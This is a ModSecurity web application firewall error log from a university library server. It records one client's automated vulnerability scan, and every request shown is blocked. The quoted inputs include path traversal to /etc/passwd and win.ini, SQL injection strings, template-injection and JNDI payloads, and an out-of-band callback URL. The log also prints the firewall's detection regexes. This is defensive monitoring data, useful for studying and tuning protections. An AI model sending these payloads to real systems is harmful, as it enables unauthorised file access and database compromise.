[Tue Aug 29 11:44:27.375792 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfGac8AAAAT"]
[Tue Aug 29 11:44:29.466241 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfGad0AAAAT"]
[Tue Aug 29 11:44:32.376445 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAdftjAAAAAG"]
[Tue Aug 29 11:44:35.397720 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4p8yofxk9rmra.oast.site found within TX:1: cjmnbitjmimt14dgn26g4p8yofxk9rmra.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfSWcsAAAAB"]
[Tue Aug 29 11:44:35.454922 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAhBR-AAAAAX"]
[Tue Aug 29 11:44:43.615112 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfg71oAAAAe"]
[Tue Aug 29 11:44:44.364846 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfkzCcAAAAi"]
[Tue Aug 29 11:44:47.380037 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdQ3tcAAAAV"]
[Tue Aug 29 11:44:47.632986 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAdxUh8AAAAC"]
[Tue Aug 29 11:44:48.457567 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfiYrEAAAAg"]
[Tue Aug 29 11:44:48.462069 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAc4E0sAAAAP"]
[Tue Aug 29 11:44:48.462170 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAdftl4AAAAG"]
[Tue Aug 29 11:44:49.392596 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfSWeoAAAAB"]
[Tue Aug 29 11:44:50.442722 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfSWfAAAAAB"]
[Tue Aug 29 11:44:51.437342 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfSWfYAAAAB"]
[Tue Aug 29 11:44:53.451825 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAhMtU4AAAAM"]
[Tue Aug 29 11:44:56.430688 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAdQ3wAAAAAV"]
[Tue Aug 29 11:44:59.412387 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAhT3vUAAAAD"]
[Tue Aug 29 11:45:00.888714 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh4DWkAAAA2"]
[Tue Aug 29 11:45:01.119499 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAg4DeMAAAAI"]
[Tue Aug 29 11:45:02.434993 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfg76cAAAAe"]
[Tue Aug 29 11:45:02.448900 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAftVIEAAAAf"]
[Tue Aug 29 11:45:02.450415 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAheaXsAAAAY"]
[Tue Aug 29 11:45:03.398535 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAfGahIAAAAT"]
[Tue Aug 29 11:45:04.439426 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAh7wr8AAAA5"]
[Tue Aug 29 11:45:05.376731 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhkLeUAAAAh"]
[Tue Aug 29 11:45:06.386706 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAftVIkAAAAf"]
[Tue Aug 29 11:45:07.384374 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAdxUkcAAAAC"]
[Tue Aug 29 11:45:09.406535 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131cCo-f0AAAh4DXcAAAA2"]
[Tue Aug 29 11:45:10.360509 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh6rJ0AAAA4"]
[Tue Aug 29 11:45:11.397483 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAdxUkwAAAAC"]
[Tue Aug 29 11:45:12.362353 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAc4E4MAAAAP"]
[Tue Aug 29 11:45:13.406535 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAhpwPcAAAAm"]
[Tue Aug 29 11:45:15.362361 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhhcwYAAAAd"]
[Tue Aug 29 11:45:16.357238 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhxwl4AAAAv"]
[Tue Aug 29 11:45:17.363489 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhZRd8AAAAG"]
[Tue Aug 29 11:45:17.412700 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhlz4YAAAAi"]
